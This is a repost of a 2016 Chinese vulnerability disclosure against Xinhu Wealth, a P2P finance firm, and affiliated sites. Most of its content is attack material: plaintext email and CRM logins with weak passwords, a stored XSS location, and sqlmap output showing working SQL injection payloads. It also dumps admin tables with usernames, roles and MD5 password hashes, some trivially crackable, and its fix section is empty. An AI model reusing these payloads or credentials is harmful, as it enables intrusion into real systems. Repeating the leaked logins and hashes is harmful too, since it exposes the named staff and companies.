记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

P2P金融安全之新湖财富各系统漏洞大礼包

2016-01-16 22:00

http://**.**.**.**/

code 区域

1.png



2.png



漏洞证明:

一、邮箱

code 区域
wangxia/wangxia123

lixin/lixin123



code 区域

3.png



4.png



二、CRM系统

code 区域
yangbin/123456

liye/123456

wangyue/123456

liuyunping/123456



code 区域

5.png



6.png



7.png



三、财富学院

http://**.**.**.**/home/shareDetail?id=215 存储xss漏洞

8.png



四、植瑞投资

http://**.**.**.**/news.php?id=361

code 区域
Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=361) AND 3118=3118 AND (5670=5670



Type: UNION query

Title: MySQL UNION query (NULL) - 8 columns

Payload: id=-6199) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a7a7071,0x47536f5844736e70706d,0x7162627071),NULL,NULL,NULL#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind (SELECT)

Payload: id=361) AND (SELECT * FROM (SELECT(SLEEP(5)))mhNU) AND (4960=4960

---

web server operating system: Windows

web application technology: Apache 2.2.22

back-end DBMS: MySQL 5.0.11

available databases [2]:

[*] information_schema

[*] zhirui

Database: zhirui

[7 tables]

+--------------------+

| zr_admin |

| zr_article |

| zr_diy |

| zr_images |

| zr_jingzhi_revenue |

| zr_menu |

| zr_product |

+--------------------+

Database: zhirui

Table: zr_admin

[4 entries]

+----+----------+----------------------------------+-------------+----------+-----------------+-----------------+

| id | note | pass | user | nickname | authority | authority_group |

+----+----------+----------------------------------+-------------+----------+-----------------+-----------------+

| 5 | <blank> | 140e25f6e310653280672b421e7d6d49 | adminzhirui | 超级管理员 | 2,36,37,8,15,39 | <blank> |

| 10 | 非管理员常用账号 | 13c24640e2d04040237a191b343a3100 | yunying | 运营 | 2,8,15 | <blank> |

| 11 | <blank> | 13c24640e2d04040237a191b343a3100 | touzi | 投资部 | 2,39 | <blank> |

| 12 | <blank> | d6b0ab7f1c8ab8f514db9a6d85de160a | chanpin | 产品部 | 2,39 | <blank> |

+----+----------+----------------------------------+-------------+----------+-----------------+-----------------+



五、植信基金

http://**.**.**.**/product.php/detail?id=87

code 区域
Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=87) AND 9452=9452 AND (7390=7390



Type: UNION query

Title: MySQL UNION query (NULL) - 14 columns

Payload: id=-3884) UNION ALL SELECT NULL,NULL,CONCAT(0x7162717071,0x74454662534a4e707541,0x716b786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

---

web server operating system: Windows

web application technology: Apache 2.2.22

back-end DBMS: MySQL 5

available databases [2]:

[*] information_schema

[*] zhixin

Database: zhixin

[6 tables]

+------------+

| zx_admin |

| zx_article |

| zx_diy |

| zx_images |

| zx_menu |

| zx_product |

+------------+

Database: zhixin

Table: zx_admin

[2 entries]

+----+----------+----------------------------------+---------+----------+--------------+-----------------+

| id | note | pass | user | nickname | authority | authority_group |

+----+----------+----------------------------------+---------+----------+--------------+-----------------+

| 5 | <blank> | 140e25f6e310653280672b421e7d6d49 | admin | 超级管理员 | 2,36,37,8,15 | <blank> |

| 10 | 非管理员常用账号 | e10adc3949ba59abbe56e057f20f883e | yunying | 运营 | 2,36,37,8,15 | <blank> |

+----+----------+----------------------------------+---------+----------+--------------+-----------------+



六、新湖财富官网

code 区域
http://**.**.**.**/news.php?id=209

http://**.**.**.**/news.php?t=1

http://**.**.**.**/product.php?pid=185

http://**.**.**.**/club.php?aid=105

http://**.**.**.**/product.php?cid=1

http://**.**.**.**/club.php?cid=1

http://**.**.**.**/branch.php?bid=5



code 区域
Parameter: id (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: id=209) AND 5874=5874 AND (2443=2443



Type: UNION query

Title: MySQL UNION query (NULL) - 8 columns

Payload: id=-3235) UNION ALL SELECT NULL,NULL,CONCAT(0x7171706271,0x795353794d6443594851,0x717a626a71),NULL,NULL,NULL,NULL,NULL#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind (SELECT)

Payload: id=209) AND (SELECT * FROM (SELECT(SLEEP(5)))IjsN) AND (1818=1818

---

[10:45:20] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: Apache 2.2.22

back-end DBMS: MySQL 5.0.11

[10:45:20] [INFO] fetching database names

[10:45:21] [INFO] the SQL query used returns 2 entries

[10:45:21] [INFO] retrieved: information_schema

[10:45:21] [INFO] retrieved: xinhucaifu

available databases [2]:

[*] information_schema

[*] xinhucaifu

Database: xinhucaifu

[32 tables]

+--------------------------+

| xh_activity |

| xh_admin |

| xh_adviser |

| xh_article |

| xh_article_type |

| xh_branch |

| xh_campus |

| xh_club |

| xh_club_appointment |

| xh_club_article |

| xh_club_partner |

| xh_club_slide |

| xh_club_type |

| xh_diy |

| xh_financial_appointment |

| xh_images |

| xh_jingzhi_crm |

| xh_jingzhi_revenue |

| xh_job_apply |

| xh_job_collect |

| xh_member |

| xh_menu |

| xh_message |

| xh_notice |

| xh_product |

| xh_product_appointment |

| xh_product_type |

| xh_questionnaire |

| xh_recruit |

| xh_recruit_news |

| xh_report |

| xh_staff |

+--------------------------+

Database: xinhucaifu

Table: xh_admin

[7 entries]

+----+---------------------------+----------------------------------+------------+----------+-----------------------------------------------------------------------------------+-----------------+

| id | note | pass | user | nickname | authority | authority_group |

+----+---------------------------+----------------------------------+------------+----------+-----------------------------------------------------------------------------------+-----------------+

| 5 | <blank> | 140e25f6e310653280672b421e7d6d49 | adminxinhu | 超级管理员 | 2,4,5,22,7,8,10,12,13,14,15,18,20,23,24,25,26,27,35,36,37,39,29,30,32,34,38,41,42 | <blank> |

| 6 | 市场部账号,可以操作文章管理、分支机构、留言、市场 | 97dd6bb637e2f90e33b4b375f45ed8f9 | shichang | 市场部 | 2,7,8,10,12,15,18,20,23,24,25,26,27 | <blank> |

| 7 | 产品部,叶航他们维护首页的头部现金信息 | 5a690d842935c51f26f473e025c1b97a | chanpin | 产品部 | 2,32,34 | <blank> |

| 8 | 客服部门 | f3af840d8bd2e489635572d086af8425 | kefu | 客服部 | 2,4,5,22,13,15,34,38,41,42 | <blank> |

| 9 | 人力部,负责招聘信息 | d2b02d4575fd35a9e9fc034125f7c1c8 | renli | 人力招聘 | 2,15,35,36,37,39 | <blank> |

| 10 | <blank> | 8b5a31ad65bd43a4808c745fdb82b9a5 | touzi | 投资部 | 2,34 | <blank> |

| 11 | <blank> | 5a690d842935c51f26f473e025c1b97a | zhirui | 植瑞基金 | 2,32 | <blank> |

+----+---------------------------+----------------------------------+------------+----------+---------------------------------------------------



七、员工信息查询系统

9.png

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2016-0156431

阅读:252923 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“P2P金融安全之新湖财富各系统漏洞大礼包”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

广而告之 💖

标签云 ☁

本页关键词 💎